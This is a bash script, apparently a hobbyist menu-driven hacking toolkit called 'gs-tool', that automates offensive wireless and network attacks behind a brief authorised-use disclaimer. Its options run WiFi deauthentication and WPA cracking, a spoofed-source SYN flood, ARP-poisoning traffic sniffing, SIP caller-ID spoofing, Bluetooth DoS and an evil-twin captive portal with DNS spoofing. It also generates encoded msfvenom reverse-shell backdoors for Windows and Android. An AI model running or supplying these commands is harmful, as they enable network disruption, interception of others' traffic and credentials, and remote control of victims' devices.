#!/bin/bash 
clear



echo -e ' \e[1;33m '
echo '   ██████╗ ███████╗   ████████╗ ██████╗  ██████╗ ██╗               '
echo '  ██╔════╝ ██╔════╝   ╚══██╔══╝██╔═══██╗██╔═══██╗██║               '
echo -e ' \e[1;31m ██║  ███╗███████╗█████╗██║   ██║   ██║██║   ██║██║ '    
echo '  ██║   ██║╚════██║╚════╝██║   ██║   ██║██║   ██║██║               '
echo '  ╚██████╔╝███████║      ██║   ╚██████╔╝╚██████╔╝███████╗          '
echo '   ╚═════╝ ╚══════╝      ╚═╝    ╚═════╝  ╚═════╝ ╚══════╝          '
echo
echo
echo -e " \e[1;34m         by get-sum   "
echo -e " \e[1;31m        ------------ "
echo -e " \e[1;34m               insta _.get_sum._ "
echo -e " \e[1;31m            ----------------------- "
echo
echo
echo
tput blink; echo "    this program is only intended for vulnerability research " ; tput sgr0
tput blink; echo -e " \e[1;31m   on systems that you own or for which you have been authorized " ; tput sgr0
echo
echo
echo
echo -e " \e[1;35m ENTER "
echo -e " \e[1;31m "
read -p 'gs-tool : ' choix1
echo
clear






while [ test ]
do

echo    -e "\e[1;01m "
echo    -e "\e[1;31m           ----------- "
echo      -e "\e[1;34m             GS-TOOL "
echo    -e "\e[1;31m           -----------"
echo -e " \e[1;34m        by GeT-sUm           - MeNu -   "
echo -e " \e[1;31m      -------------         ----------      "
echo 
echo -e ' \e[1;31m '
echo 
read -p 'gs-tool : ' choix




if [ $choix = "" ]
then
echo error
fi



if [ $choix = "monitor" ]

then
echo -e "\e[1;35m        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo
echo -e "\e[1;31m           monitor mode    for tp-link TL-WN722N , alpha network ect "
echo -e "\e[1;35m        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo              
echo -e "\e[1;33m   by get-sum"
echo " ------------"
echo -e "\e[1;31 "
echo
echo
read -p ' interface : ' interface 
sudo ifconfig wlan0 down &>/dev/null
echo [OK] $interface down
airmon-ng check kill &>/dev/null
echo [OK] check kill
ifconfig $interface down
iwconfig $interface mode monitor
ifconfig $interface up
     if [ $? -eq 0 ]
     then
     echo -e "\e[1;32" [OK] $interface mode monitor
     else
     echo -e "\e[1;31" [!] divice $interface not compatible
     fi
 

fi






if [ $choix = "iw" ]
then
xterm -e "airodump-ng wlan0" &>/dev/null
     if [ $? -eq 0 ]
     then
     echo -e "\e[1;32" [OK] monitor modeactif
     else
     echo -e "\e[1;31" [!] monitor mode not actif
     fi
fi











if [ $choix = "help" ]
then
echo
echo
echo
echo
echo
echo -e " \e[1;34m "
echo
echo    "                 ---------------------------------------------- "
echo -e " \e[1;34m                [+]    show deffensives options : defensive   "
echo -e " \e[1;31m                ---------------------------------------------- "
echo    "                 [+]    show offensives options  : offensive      "
echo   	 "                 ---------------------------------------------- "
echo
echo
echo
echo
echo
echo
echo
echo
fi









if [ $choix = "offensive" ]
then
echo -e "\e[1;01m "
echo -e "\e[1;32m "
echo    '   -------------------------------------------------------------------------  '
tput blink; echo    '                [!]   These are educational test options   [!]                '; tput sgr0
echo    '   -------------------------------------------------------------------------  '
echo    '   [$] clear : clear                  | [$] ifconfig : ifconfig            |  '
echo -e '\e[1;33m   -----------------------------v------------------------------v------------  '
echo    '   [+] sniffing : sniff               | [+] monitor mode : monitor         |  '
echo    '   -------------------------------------------------------------------------  '
echo    '   [+] network scan : nc              | [+] crack wifi : crack             |  '
echo    '   -------------------------------------------------------------------------  '
echo    '   [+] ports scan : pscan (nmap)      | [+] Deauthentication Attack : da   |  '
echo    '   -------------------------------------------------------------------------  '
echo    '   [+] denial of service : dos        | [+] backdoor undetectable : bacd   |  '
echo    '   -------------------------------------------------------------------------  '
echo    '   [+] update                         | [+] bluetooth DOS : bdos           |  '
echo    '   -------------------------------------------------------------------------  '
echo    '   [+] install dependances : ind      | [+] captif portal attack : cpa     |  '
echo    '   -------------------------------------------------------------------------  '
fi












if [ $choix = "defensive" ]
then
echo
echo
echo
echo
echo
echo -e "\e[1;34m  "
echo " -------------------------- "
echo " anti deauth attack : pda | "
echo " -------------------------- "
echo
echo
echo
echo
echo
fi















if [ $choix = "clear" ]
then
clear
fi


if [ $choix = "shutdown" ]
then
shutdown -h now
fi


if [ $choix = "scan" ]
then
./scan
fi


if [ $choix = "ifconfig" ]
then
echo
echo
ifconfig
echo
echo
fi


if [ $choix = "reboot" ]
then
reboot
fi



if [ $choix = "sip" ]
then
echo
echo
echo
nmap 192.168.1.* -p 5060 --open
echo
echo
echo
echo
echo Ip of the sip machine
echo
echo
echo
echo
echo
read -p 'ip address : ' ipsip
echo
echo
echo
echo
echo
echo
read -p 'message : ' messagesip
echo
echo
echo
echo
echo
read -p 'phone number spoof : ' srcc
echo
echo
echo
echo
echo

xterm -title sip-spoof -e 'msfconsole -q -x "use auxiliary/voip/sip_invite_spoof; set MSG $messagesip; set rhost $ipsip; set SRCADDR $srcc; set RPORT 5060; run; " '
fi



if [ $choix = "nano" ]
then
nano gs-tool
fi


if [ $choix = "reboot" ]
then
reboot
fi 


if [ $choix = "dump" ]
then
xterm -title dumpw -e airodump-ng wlan0
fi



if [ $choix = "top" ]
then
xterm -e top
fi



if [ $choix = "net" ]
then
rm -rf *.cap
rm -rf *.csv
rm -rf *.netxml
fi



if [ $choix = "iwconfig" ]
then
echo
echo
iwconfig
echo
echo
fi



if [ $choix = "exit" ]
then 
exit
fi

if [ $choix = "nc" ]
then
clear
echo -e "\e[1;31m       "
echo   "-----------------"
echo   "   NeTwoRk ScAn  "
echo   "-----------------"
echo
echo
xterm -title "network-scan" -hold -e ./scan | echo -e "\e[1;35m close window for stop network scan "
fi




if [ $choix = "pscan" ]
then 
clear
echo
echo -e "\e[1;33m "
echo   ------------------------
echo      - ports scaner -
echo   ------------------------
echo 
echo
echo
echo -e ' \e[1;31m '
echo
read -p ' machine ip : ' ipm 
echo
echo
ping -c 2 $ipm
nmap -sS -sV -Pn -v $ipm
fi



if [ $choix = "crack" ]
then
clear
echo
echo
echo -e ' \e[1;33m '
echo -----------------------
echo -  retrival handshak  - 
echo -----------------------
echo
echo -e ' \e[1;31m '
echo 'interface ex : wlan0, wlan0mon'
echo
echo
echo -e ' \e[1;31m '
read -p 'interface : ' winterface
echo -e ' \e[1;37m '
n_secondes=35
( xterm -title wait... -e "airodump-ng $winterface >> lewifi1.txt") &
sleep 35
kill $!
cat lewifi1.txt
rm -r -f lewifi1.txt
echo
echo
echo -e '\e[1;33m '
echo choose acces point
echo
echo
echo -e ' \e[1;31m '
read -p 'bssid: ' apbssid
echo -e ' \e[1;37m '
echo
echo
echo -e ' \e[1;31m '
read -p 'chanel : ' apch
echo -e ' \e[1;37m '
echo
echo
echo -e ' \e[1;33m '
echo    wpa, wep etc
echo  ----------------
echo
echo
echo -e ' \e[1;31m '
echo
read -p 'security : ' apsec

 if [ $apsec = "wep" ]
 then
 xterm -e airodump-ng --bssid $apbssid -c $apch $winterface | airplay-ng $winterface -c $apch -b $apbssid -r crackw &
 sleep 16
 kill $!
 aircrack-ng crackw-01.cap
 fi
  
  
              
             
              
              

 
 if [ $apsec = "wpa" ] 
 then
 echo
 echo
 echo
 echo
 n_secondes=15
 ( xterm -title "wait-15s..." -e "airodump-ng -c $apch --bssid $apbssid $winterface >> lewifi1.txt") &
 sleep 15
 kill $!
 echo [ok]
 rm -r -f lewifi1.txt
 echo
 echo
 xterm -title crack -e airodump-ng -c $apch --bssid $apbssid -w $apbssid $winterface | xterm -title deauth -e aireplay-ng -0 16 -a $apbssid $winterface | tput blink; echo -e  '\e[1;35m  close window if there is hanshake '; tput sgr0

      if [ $? -eq 1 ]
      then
          while [ $? -ne "1" ]
          do
          xterm -title "Deauthentication-Attack" -e aireplay-ng -0 122222 -a $bssidda $interfaceda
          done
      fi
 echo wait ...
 sleep 3
 echo
 echo
 echo
 echo
 echo -e  '\e[1;33m '
 echo ------------------
 echo   crack handshake
 echo  - aircrack-ng -
 echo ------------------
 echo
 echo  " n : no  or y : yes"
 echo
 read -p 'wordlist : ' wordw
 echo
 echo
 echo
 echo
 echo
    if [ $wordw = "n" ]
    then
    crunch 8 25 azertyuioqsdfghjklmwxcvbn01234567890 | aircrack-ng -w - -b $apbssid -a wpa $apbssid-01.cap
    echo
    echo
    fi
    
    if [ $wordw = "y" ]
    then
    echo
    echo -e  '\e[1;33m '
    echo wordlist
    echo
    echo
    echo
    echo -e  '\e[1;31m '
    echo
    read -p 'wordlist : ' wordcrack
    echo
    echo
    ehco
    aircrack-ng -w $wordcrack -b $apbssid -a wpa $apbssid-01.cap
    fi
    
    
 fi
fi




if [ $choix = "dos" ]
then
clear
echo
echo
echo -e  '\e[1;33m '
echo   -----------------------
echo   -  DeNiAl-Of-SeRvIcE  -
echo   -----------------------
echo    -  ip of the target - 
echo    ---------------------
echo
echo
echo
echo  
echo
echo -e  '\e[1;31m '
read -p 'ip : ' ipdos
echo
echo
echo
echo
echo
xterm -title DOS -e "hping3 -c 1000000 -d 120 -S -w 64 -p 21 --flood --rand-source $ipdos &>/dev/null"
fi









if [ $choix = "ls" ]
then
ls
fi


if [ $choix = "shell" ]
then
exit
fi




if [ $choix = "ind" ]
then 
clear
apt-get update
apt-get install xterm
echo -e  '\e[1;32m '
echo [OK] XTERM
echo -e  '\e[1;30m '
apt-get install hping3
echo -e  '\e[1;32m '
apt-get install aircrack-ng
apt install aircrack-ng
apt install nmap
apt-get install driftnet
apt install driftnet
apt-get install urlsnarf
apt install driftnet
apt install msfvenom
apt install l2ping
echo -e  '\e[1;35m '
apt-get install l2ping
apt install apache2
echo apache2 [ok]
apt install hcitool
apt install arpspoof
apt-get install arpspoof
apt install nslookup
apt-get install nslookup
apt-get install dnsspoof
apt install dnsspoof 
clear
echo '[end]'
fi





if [ $choix = "sniff" ]
then
clear
echo 
echo -e  '\e[1;31m '
echo -----------------------
echo    - sniffing mitm -
echo -----------------------
echo
echo -e  '\e[1;35m '
echo  Interface
echo
echo -e  '\e[1;31m '
read -p 'interface : ' interfacesn
echo -e  '\e[1;37m '
n_secondes=10
( xterm -title wait... -e "netdiscover >> lewifisniff.txt") &
sleep 10
kill $!
cat lewifisniff.txt
rm -r -f lewifisniff.txt
echo
echo
echo
echo -e  '\e[1;33m '
echo  IP OF TARGET
echo
echo
echo
echo -e  '\e[1;31m '
read -p 'ip : ' ipsn
echo -e  '\e[1;33m '
echo
echo
echo
echo -e  '\e[1;33m '
echo  FILE OF CAPTURE
echo
echo
echo
echo -e  '\e[1;31m '
read -p 'file : ' sniffcap
echo -e  '\e[1;37m '
echo
echo
echo
echo -e  '\e[1;33m '
echo IP OF ROUTEUR
echo
echo
echo
echo -e  '\e[1;31m '
read -p 'ip : ' routeursn
echo -e  '\e[1;37m '
echo
echo
echo
sysctl net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -j MASQUERADE
iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
iptables -A FORWARD -i $interfacesn -j ACCEPT
iptables -A INPUT -p udp --dport 53 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j ACCEPT
 iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \
    --to-destination 192.168.3.1:80
    iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT \
    --to-destination 192.168.3.1:53
cd capture-sniffing &>/dev/null
   if [ $? -eq 1 ]
   then
   mkdir capture-sniffing
   else
   cd ..
   fi
xterm -title arp-poisening -e "ettercap -Tqi $interfacesn -M arp /// ///" | xterm -title sniff1 -e "arpspoof -i interfacesn -t $routeursn $ipsn" | xterm -title sniffing -e "driftnet -i $interfacesn $ipsn >> capture-sniffing/$sniffcap.cap" | xterm -title sniff -e "urlsnarf -i $interfacesn $ipsn >> capture-sniffing/$sniffcap.cap"
fi









if [ $choix = "msf" ]
then
xterm -e msfconsole
fi



if [ $choix = "shark" ]
then
wireshark
fi





if [ $choix = "da" ]
then
echo -e  '\e[1;33m '
clear
echo
echo       --------------------------
echo         Deauthentication Attack
echo         - need monitor monde -
echo       --------------------------
echo
echo   -   INTERFACE : wlan0, wlan0mon    -  
echo   ------------------------------------
echo   
echo
echo
echo
echo -e  '\e[1;31m '
read -p 'interface : ' interfaceda
n_secondes=15
(xterm -title "wait-15S..." -e "airodump-ng $interfaceda >> lewifi.txt") &
sleep 15
kill $!
cat lewifi.txt
rm -r -f lewifi.txt
echo -e  '\e[1;33m '
echo
echo  -------------------------
echo   Deauthentication Attack
echo   - need monitor monde -
echo  -------------------------
echo
echo
echo -e  '\e[1;31m '
echo  acces point bssid
echo
echo
echo
echo -e  '\e[1;31m '
read -p  'bssid : ' bssidda
echo -e  '\e[1;37m '
echo
echo
echo
echo
echo   channel of acces point
echo
echo
echo
echo -e  '\e[1;31m '
read -p 'channel : ' chanelda
echo -e  '\e[1;37m '
echo
echo
n_secondes=5
( xterm -title wait... -e "airodump-ng --bssid $bssidda -c $chanelda $interfaceda") & 
sleep 5
kill $!
clear
echo -e  '\e[1;32m '
echo attack started ... 
xterm -title "Deauthentication-Attack" -e aireplay-ng -0 122222 -a $bssidda $interfaceda
      
      if [ $? -eq 1 ]
      then
          while [ $? -ne "1" ]
          do
          xterm -title "Deauthentication-Attack" -e aireplay-ng -0 122222 -a $bssidda $interfaceda
          done
      fi
sleep 5.8
fi











if [ $choix = "pda" ]
then
rm -rf patchdeauth.sh
rm -rf macchanger.txt
echo
echo
echo -e '\e[1;33m '
echo
echo ALERTE
echo
echo INTERFACE USED
echo
echo
read -p 'interface : ' interfacepda

 




echo "\
#!/bin/bash

rm -rf deauth.txt
xterm -e 'tcpdump -i $interfacepda | grep DeAuthentication > deauth.txt' &
rm -rf patchdeauth.sh
rm -rf macchanger.txt 
le='2'



for i in {1..99999}
do
      sleep 8
      line=$(wc -l < deauth.txt)
      sleep 5.99

           if [ $"line" -ge $"le" ]
           then






            echo '
                 #!/bin/bash 
                 clear
                 while [ mac ]
                 do
                 sleep 2
                 echo ------------------------------------------
                 echo -   DeAuthentication AtTaCk PROTECTION   -
                 echo ------------------------------------------
                 ifconfig $interfacepda down
                 echo
                 echo
                 echo
                 echo ----------------------------------
                 macchanger -a $interfacepda  >> macchanger.txt
                 echo ----------------------------------
                 echo
                 echo
                 echo
                 sleep 18
                 done ' > patchdeauth.sh
                 chmod 777 *






            sudo xterm -title ALERTE-deauth-attack -e ./patchdeauth.sh
            



           


            fi


      sleep 12.99



done " > antideauth.sh




sudo chmod 777 *
echo 
sleep 3


fi













if [ $choix = "bacd" ]
then
clear
echo  -----------------------
echo    backdoor reverse tcp
echo  -----------------------
echo os ex: windows , android
read -p ' os :' osbd
echo
echo  HOST
echo
read -p 'host : ' hostbd
echo
echo PORT
echo
read -p 'port : ' portbd
echo files name
read -p 'name : ' namebd




      if [ $osbd = "windows" ] 
      then
        msfvenom -p $osbd/meterpreter/reverse_tcp lhost=$hostbd -e x86/shikata_ga_nai -i 11 lport=$portbd --platform windows -f exe -a x86 > $namebd.exe
        echo
        echo
        echo
        echo listening on $hostbd : $portbd
        echo
        echo
        echo
        msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp;  set lhost $hostbd ; set lport $portbd ; exploit ; "
      fi

      if [ $osbd = "android" ]
      then
        msfvenom -p $osbd/meterpreter/reverse_tcp lhost=$hostbd lport=$portbd > $namebd.apk
        echo
        echo
        echo
        echo listening on $hostbd : $portbd
        echo
        echo
        echo
        msfconsole -q -x "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp;  set lhost $hostbd ; set lport $portbd ; exploit ; "
      fi



fi





if [ $choix = "bdos" ]
then
echo
echo
echo
echo
echo
echo  ' -------------------------- '
echo  ' -    bluetooth attack    - '
echo  ' -------------------------- '
echo
echo
hcitool scan
echo
echo
echo
read -p 'mac address : ' macbdos
xterm -title bluetooth-DOS -e l2ping -s 10000 $macbdos
fi



if [ $choix = "cpa" ]
then
echo
echo
echo  -e  '\e[1;34m '
echo '   --------------------  '
echo '      PoRtAl  CaPtIf      '
echo -e '\e[1;31m          AtTaCk    '
echo '   --------------------  '
echo -e '\e[1;32m   not finished '
echo
echo -e  '\e[1;33m '
echo
echo
echo
echo '   -Interface used- '
echo
echo
echo
echo  -e '\e[1;31m '
read -p 'interface : ' interfacecpa
n_secondes=7
( xterm -title wait... -e "airodump-ng $interfacecpa >> lewifi1.txt &>/dev/null") &
sleep 7
kill $!
cat lewifi1.txt
rm -r -f lewifi1.txt
echo
echo
echo
echo name of the acces point 
echo
echo
echo
read -p 'ap : ' apcpa
echo
echo
echo
echo bssid of the acces point 
echo
echo
echo
read -p 'bssid : ' bssidcpa
echo
echo
echo
echo channel of the acces point
echo
echo
echo
read -p 'ch : ' chcpa
xterm -title cpa -e "airbase-ng $interfacecpa -e $apcpa -c 6" &
sleep 2.5
ifconfig at0 up 192.168.3.1 netmask 255.255.255.0
xterm -e dhcpd -d -f -cf dhcpd12.conf &
xterm -title airodump-$bssidcpa -e "airodump-ng $interfacecpa --bssid $bssidcpa -c $chcpa" &
sleep 1.5



      if [ $? -eq "0" ]
      then
      echo 
      echo -e  '\e[1;33m '
      echo "[ok] airodump-ng"
      else
      echo
      echo -e  '\e[1;31m '
      echo "[ERROR] airodump-ng"
      fi


sleep 1.75

xterm -e aireplay-ng $interfacecpa -0 99989 -a $bssidcpa &


      if [ $? -eq "0" ]
      then
      echo 
      echo -e  '\e[1;33m '
      echo "[ok] deauth attack"
      else
      echo
      echo -e  '\e[1;31m '
      echo "[ERROR] deauth attack"
      fi


      if [ $? -eq 1 ]
      then
          while [ $? -ne "1" ]
          do
          xterm -title "Deauthentication-Attack" -e aireplay-ng -0 122222 -a $bssidcpa $interfacecpa
          done
      fi

sleep 5

sysctl net.ipv4.ip_forward=1
iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain
  iptables -P FORWARD ACCEPT

  iptables -A INPUT -p tcp --dport 443 -j ACCEPT
  iptables -A INPUT -p tcp --dport 80 -j ACCEPT
  iptables -A INPUT -p udp --dport 53 -j ACCEPT
  iptables -A INPUT -p udp --dport 67 -j ACCEPT

  iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \
    --to-destination 192.168.3.1:80
  iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \
    --to-destination 192.168.3.1:443
  iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT \
    --to-destination 192.168.3.1:53
  iptables -t nat -A PREROUTING -p udp --dport 67 -j DNAT \
    --to-destination 192.168.3.1:67
  iptables -t nat -A POSTROUTING -j MASQUERADE
  xterm -title apache -e "service apache2 start" &
xterm -e "dnsspoof -i at0 -f hostdns.txt"
fi







if [ $choix = "update" ]
then
cd ..
rm -r -f gs-tool
git clone https://github.com/GET-SUM/gs-tool
cd gs-tool
chmod 777 *
./gs-tool
echo
echo [updated programme]
fi



done
